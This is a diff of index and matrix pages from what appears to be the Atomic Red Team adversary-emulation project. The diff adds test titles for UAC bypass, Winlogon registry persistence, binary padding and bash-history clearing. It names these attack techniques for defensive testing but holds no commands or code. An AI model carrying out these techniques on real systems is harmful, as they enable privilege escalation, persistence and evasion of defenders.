- [T1009 Binary Padding](./T1009/T1009.md)
- Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- [T1146 Clear Command History](./T1146/T1146.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
+3 -2
View File
@@ -1,7 +1,8 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- [T1176 Browser Extensions](./T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
@@ -190,7 +191,7 @@
# defense-evasion
- [T1009 Binary Padding](./T1009/T1009.md)
- Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- [T1146 Clear Command History](./T1146/T1146.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
+1 -1
View File
@@ -58,7 +58,7 @@
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Signed Script Proxy Execution](./T1216/T1216.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](./T1151/T1151.md) | | | | | | |
| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Winlogon Helper DLL](./T1004/T1004.md) | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Timestomp](./T1099/T1099.md) | | | | | | |
| | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+10 -1
View File
@@ -9,6 +9,9 @@
- [T1009 Binary Padding](./T1009/T1009.md)
- [T1088 Bypass User Account Control](./T1088/T1088.md)
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- [T1191 CMSTP](./T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -140,6 +143,9 @@
- Atomic Test #1: Application Shim Installation [windows]
- [T1088 Bypass User Account Control](./T1088/T1088.md)
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -252,7 +258,10 @@
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1004 Winlogon Helper DLL](./T1004/T1004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
# discovery
- [T1087 Account Discovery](./T1087/T1087.md)
+1 -1
View File
@@ -42,7 +42,7 @@
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Rootkit](./T1014/T1014.md) | | | | | | |
| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | [Winlogon Helper DLL](./T1004/T1004.md) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | | | [Signed Binary Proxy Execution](./T1218/T1218.md) | | | | | | |